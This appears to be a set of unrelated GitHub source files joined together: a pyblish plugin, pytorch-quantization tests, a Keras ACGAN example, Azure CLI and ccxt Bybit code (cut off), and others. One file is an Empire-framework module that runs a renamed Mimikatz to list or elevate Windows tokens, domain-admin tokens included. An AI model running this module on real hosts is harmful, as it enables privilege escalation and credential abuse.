| |________________| |
| | | |
| | ... | |
| |________________| |
|____________________|
"""
label = "Starter Asset"
order = pyblish.api.IntegratorOrder
families = [
"starter.model",
"starter.rig",
"starter.animation"
]
def process(self, instance):
import os
import json
import errno
import shutil
from pyblish_starter import api
context = instance.context
# Atomicity
#
# Guarantee atomic publishes - each asset contains
# an identical set of members.
# __
# / o
# / \
# | o |
# \ /
# o __/
#
if not all(result["success"] for result in context.data["results"]):
raise Exception("Atomicity not held, aborting.")
# Assemble
#
# |
# v
# ---> <----
# ^
# |
#
stagingdir = instance.data.get("stagingDir")
assert stagingdir, (
"Incomplete instance \"%s\": "
"Missing reference to staging area."
% instance
)
root = context.data["workspaceDir"]
instancedir = os.path.join(root, "shared", instance.data["name"])
try:
os.makedirs(instancedir)
except OSError as e:
if e.errno != errno.EEXIST: # Already exists
self.log.critical("An unexpected error occurred.")
raise
version = api.find_latest_version(os.listdir(instancedir)) + 1
versiondir = os.path.join(instancedir, api.format_version(version))
# Metadata
# _________
# | |.key = value
# | |
# | |
# | |
# | |
# |_________|
#
fname = os.path.join(stagingdir, ".metadata.json")
try:
with open(fname) as f:
metadata = json.load(f)
except IOError:
metadata = {
"schema": "pyblish-starter:version-1.0",
"version": version,
"path": versiondir,
"representations": list(),
# Collected by pyblish-base
"time": context.data["date"],
"author": context.data["user"],
# Collected by pyblish-maya
"source": os.path.join(
"{root}",
os.path.relpath(
context.data["currentFile"],
api.root()
)
),
}
for filename in instance.data.get("files", list()):
name, ext = os.path.splitext(filename)
metadata["representations"].append(
{
"schema": "pyblish-starter:representation-1.0",
"format": ext,
"path": "{dirname}/%s{format}" % name
}
)
# Write to disk
# _
# | |
# _| |_
# ____\ /
# |\ \ / \
# \ \ v \
# \ \________.
# \|________|
#
with open(fname, "w") as f:
json.dump(metadata, f, indent=4)
# Metadata is written before being validated -
# this way, if validation fails, the data can be
# inspected by hand from within the user directory.
api.schema.validate(metadata, "version")
shutil.copytree(stagingdir, versiondir)
self.log.info("Successfully integrated \"%s\" to \"%s\"" % (
instance, versiondir))
| [
"lonegather@users.noreply.github.com"
] | lonegather@users.noreply.github.com |
56010a4e310d6d54195272006cb696d231a7d78a | 5289db68f1573549b287750beed02bc9c37340d3 | /tools/pytorch-quantization/tests/print_test.py | 1a4dec6d13ceb244e45e7154cc07c869329a528f | [
"ISC",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | feizhouxiaozhu/TensorRT | 5d5ac8468f67121a96d68a76e43988630c483040 | af8f24cefba42e367ec09fbb05c08a2946645258 | refs/heads/master | 2023-02-08T10:35:41.382352 | 2020-12-19T00:48:00 | 2020-12-19T02:28:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,051 | py | #
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""test for str and repr
Make sure things can print and in a nice form. Put all the print tests together so that running this test file alone
can inspect all the print messages in the project
"""
import torch
from torch import nn
from pytorch_quantization import calib
from pytorch_quantization import tensor_quant
from pytorch_quantization import nn as quant_nn
from pytorch_quantization.nn.modules.tensor_quantizer import TensorQuantizer
# pylint:disable=missing-docstring, no-self-use
class TestPrint():
def test_print_descriptor(self):
test_desc = tensor_quant.QUANT_DESC_8BIT_CONV2D_WEIGHT_PER_CHANNEL
print(test_desc)
def test_print_tensor_quantizer(self):
test_quantizer = TensorQuantizer()
print(test_quantizer)
def test_print_module(self):
class _TestModule(nn.Module):
def __init__(self):
super(_TestModule, self).__init__()
self.conv = nn.Conv2d(33, 65, 3)
self.quant_conv = quant_nn.Conv2d(33, 65, 3)
self.linear = nn.Linear(33, 65)
self.quant_linear = quant_nn.Linear(33, 65)
test_module = _TestModule()
print(test_module)
def test_print_calibrator(self):
print(calib.MaxCalibrator(7, 1, False))
hist_calibrator = calib.HistogramCalibrator(8, None, True)
hist_calibrator.collect(torch.rand(10))
print(hist_calibrator)
| [
"rajeevsrao@users.noreply.github.com"
] | rajeevsrao@users.noreply.github.com |
ea488ecdd6f29b28a881a7505d69af2f10c4951b | 93872b89471eccf1414306216aa8b97df0c38cc4 | /lib/modules/credentials/mimigatoz/mimitokens.py | 79c4038c9c497452d99be0791f9929141f5078b4 | [
"BSD-3-Clause"
] | permissive | brownbelt/Empire-mod-Hackplayers | bcb1a7cd6f608e9b83011e19e1527d8ec120f932 | 315184020542012fdcf89ba4c0de0e5c00954372 | refs/heads/master | 2021-06-20T02:55:15.991222 | 2017-08-01T09:25:58 | 2017-08-01T09:25:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,522 | py | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-MimiGatoz Tokens',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-MimiGatoz function "
"to list or enumerate tokens."),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'list' : {
'Description' : 'Switch. List current tokens on the machine.',
'Required' : False,
'Value' : 'True'
},
'elevate' : {
'Description' : 'Switch. Elevate instead of listing tokens.',
'Required' : False,
'Value' : ''
},
'revert' : {
'Description' : 'Switch. Revert process token.',
'Required' : False,
'Value' : ''
},
'admin' : {
'Description' : 'Switch. List/elevate local admin tokens.',
'Required' : False,
'Value' : ''
},
'domainadmin' : {
'Description' : 'Switch. List/elevate domain admin tokens.',
'Required' : False,
'Value' : ''
},
'user' : {
'Description' : 'User name to list/elevate the token of.',
'Required' : False,
'Value' : ''
},
'id' : {
'Description' : 'Token ID to list/elevate the token of.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/credentials/Invoke-MimiGatoz.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
listTokens = self.options['list']['Value']
elevate = self.options['elevate']['Value']
revert = self.options['revert']['Value']
admin = self.options['admin']['Value']
domainadmin = self.options['domainadmin']['Value']
user = self.options['user']['Value']
processid = self.options['id']['Value']
script = moduleCode
script += "Invoke-MimiGatoz -Command "
if revert.lower() == "true":
script += "'\"token::revert"
else:
if listTokens.lower() == "true":
script += "'\"token::list"
elif elevate.lower() == "true":
script += "'\"token::elevate"
else:
print helpers.color("[!] list, elevate, or revert must be specified!")
return ""
if domainadmin.lower() == "true":
script += " /domainadmin"
elif admin.lower() == "true":
script += " /admin"
elif user.lower() != "":
script += " /user:" + str(user)
elif processid.lower() != "":
script += " /id:" + str(processid)
script += "\"';"
return script
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
0e382a491da509bd9913eff6eb831510b77bd9af | 446d9c9e98bac9bb7d6ba9d6f2639fd1ab0e68af | /pythonBook/chapter06/exercise6-23.py | 67d2bce0e2edc2ef0d9e9213eacb0216d837626a | [] | no_license | thiagofb84jp/python-exercises | 062d85f4f95332549acd42bf98de2b20afda5239 | 88ad7365a0f051021034ac6f0683b3df2de57cdb | refs/heads/main | 2023-07-19T21:15:08.689041 | 2021-08-17T10:59:09 | 2021-08-17T10:59:09 | 308,311,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | py | """
6.23. Controle da utilização de salas de um cinema
"""
lugaresVagos = [10, 2, 1, 3, 0]
while True:
sala = int(input("Sala (0 para sair do programa) :"))
if sala == 0:
print("Encerrando o programa...")
break
if sala > len(lugaresVagos) or sala < 1:
print("Sala inválida!")
elif lugaresVagos[sala - 1] == 0:
print("Desculpe, sala lotada!")
else:
lugares = int(
input(f"Quantos lugares você deseja ({lugaresVagos[sala - 1]} \
vagos): "))
if lugares > lugaresVagos[sala - 1]:
print("Esse número de lugares não está disponível.")
elif lugares < 0:
print("Número inválido.")
else:
lugaresVagos[sala - 1] -= lugares
print(f"{lugares} lugares vendidos")
print("Utilização das salas")
for x, l in enumerate(lugaresVagos):
print(f"Sala {x + 1} - {l} lugar(es) vazio(s)")
| [
"thiagofb84jp@gmail.com"
] | thiagofb84jp@gmail.com |
ff76df49ad42e40b7da91b22b4e8c1c8a4a40fb2 | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/cosmosdb/aaz/latest/cosmosdb/postgres/configuration/coordinator/__cmd_group.py | 27271cfb6425eebaca4fa2e123288c385ca59464 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 704 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command_group(
"cosmosdb postgres configuration coordinator",
is_preview=True,
)
class __CMDGroup(AAZCommandGroup):
"""Manage Azure Cosmos DB for PostgreSQL coordinator configurations.
"""
pass
__all__ = ["__CMDGroup"]
| [
"noreply@github.com"
] | Azure.noreply@github.com |
4a547b90b05cd7591bc9c34f4e87b2cd3a126aa1 | 7bbc83f3f84d7e5057cb04f6895082ab3e016e90 | /python.import/machine/test/car.py | 1c4fd081fd55c004711fe7a294435b5779d6ec81 | [] | no_license | osy1223/bit_seoul | 908f6adf007c0a7d0df2659b4fae75eb705acaea | b523d78c7b80d378a2d148b35466304f10bf4af4 | refs/heads/master | 2023-02-02T14:26:40.120989 | 2020-12-18T00:46:04 | 2020-12-18T00:46:04 | 311,279,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | def drive():
print('test 운전하다 ')
if __name__ == '__main__':
drive() | [
"osu1223@gmail.com"
] | osu1223@gmail.com |
cb606700b2241eebb71ead8c64124867f9a3a585 | f0f285567e706c1d89a730e9807ca44690f745ad | /0x0A-python-inheritance/6-base_geometry.py | 819d3ab4cf7e2b8ba06e805d561fffa5145b6703 | [] | no_license | Faith-qa/alx-higher_level_programming-1 | a43fc57414c6c946407d0795df5f9794a061a890 | 8f66f9a09088b55d44f1754ca616e75d83ca76c4 | refs/heads/main | 2023-08-07T16:41:39.830429 | 2021-09-28T06:40:49 | 2021-09-28T06:40:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | #!/usr/bin/python3
# 6-base_geometry.py
"""Defines a base geometry class BaseGeometry."""
class BaseGeometry:
"""Represent base geometry."""
def area(self):
"""Not implemented."""
raise Exception("area() is not implemented")
| [
"yosefsamuel22@gmail.com"
] | yosefsamuel22@gmail.com |
d053c0a0a25b58a278a960935bd26b497357d1c7 | e24f75482c0ae71fb0dfa6d49f3a82129569c2d9 | /changes/api/serializer/models/plan.py | 9f11af47bb2be272e1a5b9c4efd90040b5cc14a6 | [
"Apache-2.0"
] | permissive | OmarSkalli/changes | aaa6a0083c87b7d5876eb0557466be60dea45e34 | 5280b2cea13c314aeecc770853c14caaff6bbb93 | refs/heads/master | 2022-08-12T11:37:53.571741 | 2014-07-11T22:55:37 | 2014-07-11T22:55:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | import json
from changes.api.serializer import Serializer, register
from changes.models import ItemOption, Plan, Step
@register(Plan)
class PlanSerializer(Serializer):
def serialize(self, instance, attrs):
return {
'id': instance.id.hex,
'name': instance.label,
'steps': list(instance.steps),
'dateCreated': instance.date_created,
'dateModified': instance.date_modified,
}
@register(Step)
class StepSerializer(Serializer):
def get_attrs(self, item_list):
option_list = ItemOption.query.filter(
ItemOption.item_id.in_(r.id for r in item_list),
)
options_by_item = {}
for option in option_list:
options_by_item.setdefault(option.item_id, {})
options_by_item[option.item_id][option.name] = option.value
result = {}
for item in item_list:
result[item] = {'options': options_by_item.get(item.id, {})}
return result
def serialize(self, instance, attrs):
implementation = instance.get_implementation()
return {
'id': instance.id.hex,
'implementation': instance.implementation,
'order': instance.order,
'name': implementation.get_label() if implementation else '',
'data': json.dumps(dict(instance.data or {})),
'dateCreated': instance.date_created,
'options': attrs['options'],
}
| [
"cramer@dropbox.com"
] | cramer@dropbox.com |
022a783a51d72c922d8bb8e920468be3ff85df9f | dd415744288cf76c15021c486350b6dd11fe13f3 | /examples/mnist_acgan.py | 4dfd12038ee8932a587e6645e4517be04e195965 | [
"MIT"
] | permissive | kencoken/keras | 10a6c01c61b3b7c22820c8b56b2aa7fd44c43b6f | 3a495682c77eb8d594c695a53840dcc7c3ea5883 | refs/heads/master | 2020-12-24T11:10:35.447511 | 2018-11-23T13:33:38 | 2018-11-23T13:33:38 | 73,181,380 | 0 | 4 | NOASSERTION | 2018-11-23T13:33:39 | 2016-11-08T11:53:41 | Python | UTF-8 | Python | false | false | 11,329 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Train an Auxiliary Classifier Generative Adversarial Network (ACGAN) on the
MNIST dataset. See https://arxiv.org/abs/1610.09585 for more details.
You should start to see reasonable images after ~5 epochs, and good images
by ~15 epochs. You should use a GPU, as the convolution-heavy operations are
very slow on the CPU. Prefer the TensorFlow backend if you plan on iterating, as
the compilation time can be a blocker using Theano.
Timings:
Hardware | Backend | Time / Epoch
-------------------------------------------
CPU | TF | 3 hrs
Titan X (maxwell) | TF | 4 min
Titan X (maxwell) | TH | 7 min
Consult https://github.com/lukedeo/keras-acgan for more information and
example output
"""
from __future__ import print_function
from collections import defaultdict
try:
import cPickle as pickle
except ImportError:
import pickle
from PIL import Image
from six.moves import range
import keras.backend as K
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Embedding, merge, Dropout
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Convolution2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.utils.generic_utils import Progbar
import numpy as np
np.random.seed(1337)
K.set_image_dim_ordering('th')
def build_generator(latent_size):
# we will map a pair of (z, L), where z is a latent vector and L is a
# label drawn from P_c, to image space (..., 1, 28, 28)
cnn = Sequential()
cnn.add(Dense(1024, input_dim=latent_size, activation='relu'))
cnn.add(Dense(128 * 7 * 7, activation='relu'))
cnn.add(Reshape((128, 7, 7)))
# upsample to (..., 14, 14)
cnn.add(UpSampling2D(size=(2, 2)))
cnn.add(Convolution2D(256, 5, 5, border_mode='same',
activation='relu', init='glorot_normal'))
# upsample to (..., 28, 28)
cnn.add(UpSampling2D(size=(2, 2)))
cnn.add(Convolution2D(128, 5, 5, border_mode='same',
activation='relu', init='glorot_normal'))
# take a channel axis reduction
cnn.add(Convolution2D(1, 2, 2, border_mode='same',
activation='tanh', init='glorot_normal'))
# this is the z space commonly refered to in GAN papers
latent = Input(shape=(latent_size, ))
# this will be our label
image_class = Input(shape=(1,), dtype='int32')
# 10 classes in MNIST
cls = Flatten()(Embedding(10, latent_size,
init='glorot_normal')(image_class))
# hadamard product between z-space and a class conditional embedding
h = merge([latent, cls], mode='mul')
fake_image = cnn(h)
return Model(input=[latent, image_class], output=fake_image)
def build_discriminator():
# build a relatively standard conv net, with LeakyReLUs as suggested in
# the reference paper
cnn = Sequential()
cnn.add(Convolution2D(32, 3, 3, border_mode='same', subsample=(2, 2),
input_shape=(1, 28, 28)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Convolution2D(64, 3, 3, border_mode='same', subsample=(1, 1)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Convolution2D(128, 3, 3, border_mode='same', subsample=(2, 2)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Convolution2D(256, 3, 3, border_mode='same', subsample=(1, 1)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Flatten())
image = Input(shape=(1, 28, 28))
features = cnn(image)
# first output (name=generation) is whether or not the discriminator
# thinks the image that is being shown is fake, and the second output
# (name=auxiliary) is the class that the discriminator thinks the image
# belongs to.
fake = Dense(1, activation='sigmoid', name='generation')(features)
aux = Dense(10, activation='softmax', name='auxiliary')(features)
return Model(input=image, output=[fake, aux])
if __name__ == '__main__':
# batch and latent size taken from the paper
nb_epochs = 50
batch_size = 100
latent_size = 100
# Adam parameters suggested in https://arxiv.org/abs/1511.06434
adam_lr = 0.0002
adam_beta_1 = 0.5
# build the discriminator
discriminator = build_discriminator()
discriminator.compile(
optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),
loss=['binary_crossentropy', 'sparse_categorical_crossentropy']
)
# build the generator
generator = build_generator(latent_size)
generator.compile(optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),
loss='binary_crossentropy')
latent = Input(shape=(latent_size, ))
image_class = Input(shape=(1,), dtype='int32')
# get a fake image
fake = generator([latent, image_class])
# we only want to be able to train generation for the combined model
discriminator.trainable = False
fake, aux = discriminator(fake)
combined = Model(input=[latent, image_class], output=[fake, aux])
combined.compile(
optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),
loss=['binary_crossentropy', 'sparse_categorical_crossentropy']
)
# get our mnist data, and force it to be of shape (..., 1, 28, 28) with
# range [-1, 1]
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = np.expand_dims(X_train, axis=1)
X_test = (X_test.astype(np.float32) - 127.5) / 127.5
X_test = np.expand_dims(X_test, axis=1)
nb_train, nb_test = X_train.shape[0], X_test.shape[0]
train_history = defaultdict(list)
test_history = defaultdict(list)
for epoch in range(nb_epochs):
print('Epoch {} of {}'.format(epoch + 1, nb_epochs))
nb_batches = int(X_train.shape[0] / batch_size)
progress_bar = Progbar(target=nb_batches)
epoch_gen_loss = []
epoch_disc_loss = []
for index in range(nb_batches):
progress_bar.update(index)
# generate a new batch of noise
noise = np.random.uniform(-1, 1, (batch_size, latent_size))
# get a batch of real images
image_batch = X_train[index * batch_size:(index + 1) * batch_size]
label_batch = y_train[index * batch_size:(index + 1) * batch_size]
# sample some labels from p_c
sampled_labels = np.random.randint(0, 10, batch_size)
# generate a batch of fake images, using the generated labels as a
# conditioner. We reshape the sampled labels to be
# (batch_size, 1) so that we can feed them into the embedding
# layer as a length one sequence
generated_images = generator.predict(
[noise, sampled_labels.reshape((-1, 1))], verbose=0)
X = np.concatenate((image_batch, generated_images))
y = np.array([1] * batch_size + [0] * batch_size)
aux_y = np.concatenate((label_batch, sampled_labels), axis=0)
# see if the discriminator can figure itself out...
epoch_disc_loss.append(discriminator.train_on_batch(X, [y, aux_y]))
# make new noise. we generate 2 * batch size here such that we have
# the generator optimize over an identical number of images as the
# discriminator
noise = np.random.uniform(-1, 1, (2 * batch_size, latent_size))
sampled_labels = np.random.randint(0, 10, 2 * batch_size)
# we want to train the genrator to trick the discriminator
# For the generator, we want all the {fake, not-fake} labels to say
# not-fake
trick = np.ones(2 * batch_size)
epoch_gen_loss.append(combined.train_on_batch(
[noise, sampled_labels.reshape((-1, 1))], [trick, sampled_labels]))
print('\nTesting for epoch {}:'.format(epoch + 1))
# evaluate the testing loss here
# generate a new batch of noise
noise = np.random.uniform(-1, 1, (nb_test, latent_size))
# sample some labels from p_c and generate images from them
sampled_labels = np.random.randint(0, 10, nb_test)
generated_images = generator.predict(
[noise, sampled_labels.reshape((-1, 1))], verbose=False)
X = np.concatenate((X_test, generated_images))
y = np.array([1] * nb_test + [0] * nb_test)
aux_y = np.concatenate((y_test, sampled_labels), axis=0)
# see if the discriminator can figure itself out...
discriminator_test_loss = discriminator.evaluate(
X, [y, aux_y], verbose=False)
discriminator_train_loss = np.mean(np.array(epoch_disc_loss), axis=0)
# make new noise
noise = np.random.uniform(-1, 1, (2 * nb_test, latent_size))
sampled_labels = np.random.randint(0, 10, 2 * nb_test)
trick = np.ones(2 * nb_test)
generator_test_loss = combined.evaluate(
[noise, sampled_labels.reshape((-1, 1))],
[trick, sampled_labels], verbose=False)
generator_train_loss = np.mean(np.array(epoch_gen_loss), axis=0)
# generate an epoch report on performance
train_history['generator'].append(generator_train_loss)
train_history['discriminator'].append(discriminator_train_loss)
test_history['generator'].append(generator_test_loss)
test_history['discriminator'].append(discriminator_test_loss)
print('{0:<22s} | {1:4s} | {2:15s} | {3:5s}'.format(
'component', *discriminator.metrics_names))
print('-' * 65)
ROW_FMT = '{0:<22s} | {1:<4.2f} | {2:<15.2f} | {3:<5.2f}'
print(ROW_FMT.format('generator (train)',
*train_history['generator'][-1]))
print(ROW_FMT.format('generator (test)',
*test_history['generator'][-1]))
print(ROW_FMT.format('discriminator (train)',
*train_history['discriminator'][-1]))
print(ROW_FMT.format('discriminator (test)',
*test_history['discriminator'][-1]))
# save weights every epoch
generator.save_weights(
'params_generator_epoch_{0:03d}.hdf5'.format(epoch), True)
discriminator.save_weights(
'params_discriminator_epoch_{0:03d}.hdf5'.format(epoch), True)
# generate some digits to display
noise = np.random.uniform(-1, 1, (100, latent_size))
sampled_labels = np.array([
[i] * 10 for i in range(10)
]).reshape(-1, 1)
# get a batch to display
generated_images = generator.predict(
[noise, sampled_labels], verbose=0)
# arrange them into a grid
img = (np.concatenate([r.reshape(-1, 28)
for r in np.split(generated_images, 10)
], axis=-1) * 127.5 + 127.5).astype(np.uint8)
Image.fromarray(img).save(
'plot_epoch_{0:03d}_generated.png'.format(epoch))
pickle.dump({'train': train_history, 'test': test_history},
open('acgan-history.pkl', 'wb'))
| [
"francois.chollet@gmail.com"
] | francois.chollet@gmail.com |
d39baaf0bedaa00c0a8c154389eab236dc99e1b8 | 12c2d7f9c3cd315ca822e2d2cfa253075139fcc2 | /python/ccxt/bybit.py | 2912438043f33ebdb72988166e8ba59b135af76d | [
"MIT"
] | permissive | bfrasure/ccxt | 9c85494626970fc9840790211df60534bb2ca5b4 | c81273f508fa238f1a8f0ea4bf8729c2a43f1461 | refs/heads/master | 2023-09-04T15:03:37.598303 | 2021-11-23T13:29:00 | 2021-11-23T13:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110,987 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
# -----------------------------------------------------------------------------
try:
basestring # Python 3
except NameError:
basestring = str # Python 2
import json
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import InvalidNonce
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class bybit(Exchange):
def describe(self):
return self.deep_extend(super(bybit, self).describe(), {
'id': 'bybit',
'name': 'Bybit',
'countries': ['VG'], # British Virgin Islands
'version': 'v2',
'userAgent': None,
'rateLimit': 100,
'hostname': 'bybit.com', # bybit.com, bytick.com
'has': {
'cancelAllOrders': True,
'cancelOrder': True,
'CORS': True,
'createOrder': True,
'editOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchDeposits': True,
'fetchFundingRate': True,
'fetchFundingRateHistory': False,
'fetchIndexOHLCV': True,
'fetchLedger': True,
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchOrderTrades': True,
'fetchPositions': True,
'fetchPremiumIndexOHLCV': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': None,
'fetchWithdrawals': True,
'setMarginMode': True,
'setLeverage': True,
},
'timeframes': {
'1m': '1',
'3m': '3',
'5m': '5',
'15m': '15',
'30m': '30',
'1h': '60',
'2h': '120',
'4h': '240',
'6h': '360',
'12h': '720',
'1d': 'D',
'1w': 'W',
'1M': 'M',
'1y': 'Y',
},
'urls': {
'test': {
'spot': 'https://api-testnet.{hostname}',
'futures': 'https://api-testnet.{hostname}',
'v2': 'https://api-testnet.{hostname}',
'public': 'https://api-testnet.{hostname}',
'private': 'https://api-testnet.{hostname}',
},
'logo': 'https://user-images.githubusercontent.com/51840849/76547799-daff5b80-649e-11ea-87fb-3be9bac08954.jpg',
'api': {
'spot': 'https://api.{hostname}',
'futures': 'https://api.{hostname}',
'v2': 'https://api.{hostname}',
'public': 'https://api.{hostname}',
'private': 'https://api.{hostname}',
},
'www': 'https://www.bybit.com',
'doc': [
'https://bybit-exchange.github.io/docs/inverse/',
'https://bybit-exchange.github.io/docs/linear/',
'https://github.com/bybit-exchange',
],
'fees': 'https://help.bybit.com/hc/en-us/articles/360039261154',
'referral': 'https://www.bybit.com/app/register?ref=X7Prm',
},
'api': {
'spot': {
'public': {
'get': [
'symbols',
],
},
'quote': {
'get': [
'depth',
'depth/merged',
'trades',
'kline',
'ticker/24hr',
'ticker/price',
'ticker/book_ticker',
],
},
'private': {
'get': [
'order',
'open-orders',
'history-orders',
'myTrades',
'account',
'time',
],
'post': [
'order',
],
'delete': [
'order',
'order/fast',
],
},
'order': {
'delete': [
'batch-cancel',
'batch-fast-cancel',
'batch-cancel-by-ids',
],
},
},
'futures': {
'private': {
'get': [
'order/list',
'order',
'stop-order/list',
'stop-order',
'position/list',
'execution/list',
'trade/closed-pnl/list',
],
'post': [
'order/create',
'order/cancel',
'order/cancelAll',
'order/replace',
'stop-order/create',
'stop-order/cancel',
'stop-order/cancelAll',
'stop-order/replace',
'position/change-position-margin',
'position/trading-stop',
'position/leverage/save',
'position/switch-mode',
'position/switch-isolated',
'position/risk-limit',
],
},
},
'v2': {
'public': {
'get': [
'orderBook/L2',
'kline/list',
'tickers',
'trading-records',
'symbols',
'liq-records',
'mark-price-kline',
'index-price-kline',
'premium-index-kline',
'open-interest',
'big-deal',
'account-ratio',
'time',
'announcement',
'funding/prev-funding-rate',
'risk-limit/list',
],
},
'private': {
'get': [
'order/list',
'order',
'stop-order/list',
'stop-order',
'position/list',
'execution/list',
'trade/closed-pnl/list',
'funding/prev-funding-rate',
'funding/prev-funding',
'funding/predicted-funding',
'account/api-key',
'account/lcp',
'wallet/balance',
'wallet/fund/records',
'wallet/withdraw/list',
'exchange-order/list',
],
'post': [
'order/create',
'order/cancel',
'order/cancelAll',
'order/replace',
'stop-order/create',
'stop-order/cancel',
'stop-order/cancelAll',
'stop-order/replace',
'position/change-position-margin',
'position/trading-stop',
'position/leverage/save',
'position/switch-mode',
'position/switch-isolated',
'position/risk-limit',
],
},
},
'public': {
'linear': {
'get': [
'kline',
'recent-trading-records',
'funding/prev-funding-rate',
'mark-price-kline',
'index-price-kline',
'premium-index-kline',
'risk-limit',
],
},
},
'private': {
'linear': {
'get': [
'order/list',
'order/search',
'stop-order/list',
'stop-order/search',
'position/list',
'trade/execution/list',
'trade/closed-pnl/list',
'funding/predicted-funding',
'funding/prev-funding',
],
'post': [
'order/create',
'order/cancel',
'order/cancel-all',
'order/replace',
'stop-order/create',
'stop-order/cancel',
'stop-order/cancel-all',
'stop-order/replace',
'position/set-auto-add-margin',
'position/switch-isolated',
'tpsl/switch-mode',
'position/add-margin',
'position/set-leverage',
'position/trading-stop',
'position/set-risk',
],
},
},
},
'httpExceptions': {
'403': RateLimitExceeded, # Forbidden -- You request too many times
},
'exceptions': {
'exact': {
'-2015': AuthenticationError, # Invalid API-key, IP, or permissions for action.
'10001': BadRequest, # parameter error
'10002': InvalidNonce, # request expired, check your timestamp and recv_window
'10003': AuthenticationError, # Invalid apikey
'10004': AuthenticationError, # invalid sign
'10005': PermissionDenied, # permission denied for current apikey
'10006': RateLimitExceeded, # too many requests
'10007': AuthenticationError, # api_key not found in your request parameters
'10010': PermissionDenied, # request ip mismatch
'10017': BadRequest, # request path not found or request method is invalid
'10018': RateLimitExceeded, # exceed ip rate limit
'20001': OrderNotFound, # Order not exists
'20003': InvalidOrder, # missing parameter side
'20004': InvalidOrder, # invalid parameter side
'20005': InvalidOrder, # missing parameter symbol
'20006': InvalidOrder, # invalid parameter symbol
'20007': InvalidOrder, # missing parameter order_type
'20008': InvalidOrder, # invalid parameter order_type
'20009': InvalidOrder, # missing parameter qty
'20010': InvalidOrder, # qty must be greater than 0
'20011': InvalidOrder, # qty must be an integer
